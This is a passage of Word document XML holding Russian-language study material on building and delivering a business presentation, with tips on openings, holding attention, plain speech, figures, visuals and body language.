    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00656C02" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007755F7" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Деловая презентация – это не только эффективное средство маркетинговой коммуникации. Презентацию можно смело назвать удивительным синтезом элементов разных сценических искусств. Это театральная постановка, где Вы как презентатор играете главную роль, стремясь завлечь аудиторию в игру. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="007755F7" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как построить презентацию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для успешного выступления Вам нужно с первых слов:</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>вызвать интерес у присутствующих;</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>расположить к себе;</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>увязать тему презентации с интересами аудитории.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Как это сделать? На помощь придут знания из области психологии. В ходе презентации учтите, что внимание непостоянно – оно колеблется. В первые, а также в последние минуты Вашего выступления оно наиболее стабильно, поэтому в начале и в конце сообщайте именно ту информацию, которая должна запомниться. Чтобы удержать внимание разбейте всю речь на несколько блоков, а в каждый блок вставьте сочное высказывание, способное </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>пробудить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> присутствующих.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В зависимости от аудитории начало Вашей презентации может быть:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>драматическое – поведайте о возможном ущербе, который неизбежно возникнет при отказе от товара/услуги, используйте весь свой драматизм;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>любопытное – пусть это будет неординарное действие, которое тут же заинтересует аудиторию (например, съешьте демонстрационный продукт);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>забавное – расскажите интересную историю, связанную с предметом Вашего выступления;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>вопрошающее – обратитесь к присутствующим с вопросом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как избежать фиаско?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Даже интересная, но неподготовленная тема, которая прозвучит как по </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>шпаргалке</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> может закончиться провалом. Поэтому обязательноПравила успешной презентации тщательно подготовьтесь к выступлению, продумайте текст, составьте план выступления, чтобы чувствовать себя непринужденно и уверенно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оратору на заметку: помните про золотое правило трех – удачная презентация может содержать максимум три ключевых вывода. Будьте кратки, так как аудитория способна запомнить только 10% Вашей блистательной речи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как сделать сложное</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> понятным?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В своей речи используйте разговорный жанр: афоризмы, краткие фразы и даже сленг, но в допустимых формах. Разговор на бытовом уровне будет не к месту, ведь перед аудиторией профессионал. Тем не менее, при помощи собственного лексикона Вы можете эффективно презентовать предмет и сделать это доступно для присутствующих. Для этого:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>не допускайте длинных безличных предложений;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>запоминается лучше то, в чем Ваша аудитория примет непосредственное участие;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">используйте активные глаголы (вместо </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>они нуждаются в Вашей помощи</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> говорите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>им нужна Ваша помощь!</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">избегайте клише и всем надоевших выражений (допустим, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>реклама – двигатель торговли</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), эмоциональная речь вызовет больше откликов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>забудьте про неизвестные понятия и сложные технические термины;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>оживите выступление примерами из жизни, подходящими образами – это сблизит Вас с аудиторией и позволит говорить на одном языке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Факты и цифры всегда производят впечатление </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Интересно!</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Альберт Эйнштейн объяснял свою теорию относительности, шутя: </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если молодой человек сидит со своей девушкой час, он может ему показаться одной минутой. Но посадите его на раскаленную печку, и минута покажется длинною в час. Все относительно!</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Факты и цифры всегда производят впечатление, особенно если они как-то касаются аудитории. Но используйте их с осторожностью:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>крупные значения переводите в мелкие (20 операций в минуту вместо 1250 в час);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>округляйте до целых величин (к примеру, 50% - это 5 из каждых 10 Ваших клиентов);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>не перегружайте речь цифрами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Чтобы выступление запомнилось, разбавьте его зрительными образами. При этом используйте только качественный наглядный материал, иначе вызовите обратный эффект. Кроме того, он должен быть уместным, умело подобранным. Может, какие-то Ваши слова забудутся, а вот в памяти присутствующих точно останутся:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>диаграммы, рисунки, модели;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>демонстрационный материал (например, образцы продукции);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>рисунки, оказывающие воздействие.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как расположить аудиторию и сделать презентацию эффективной?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Как расположить аудиторию. Сообщайте о своих действиях (</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>через минуту я продемонстрирую Вам…</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Фокусируйте внимание присутствующих (чаще употребляйте местоимения </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, поддерживайте контакт глаз).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вовлекайте аудиторию в диалог при помощи вопросов, передвигайтесь по комнате во время монологов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Делайте паузы, акцентируйте информацию (</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>внимание, сейчас я Вам сообщу нечто очень важное!</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Меняйте темп речи, играйте голосом! Не используйте три слова там, где достаточно двух.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Не закрывайтесь от слушателей (не прячьте руки в карманы, не скрещивайте пальцы и т.п.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Говорите на простом, понятном языке – эмоционально и коротко.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пусть Ваш внешний вид будет безукоризненно-деловым.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С течением времени Ваша великолепная презентация может забыться, но если Вы будете следовать этим простым рекомендациям, то основная идея Вашего выступления останется в памяти Вашей аудитории навсегда.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00656C02" w:rsidRPr="00617AC0" w:rsidRDefault="00656C02" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
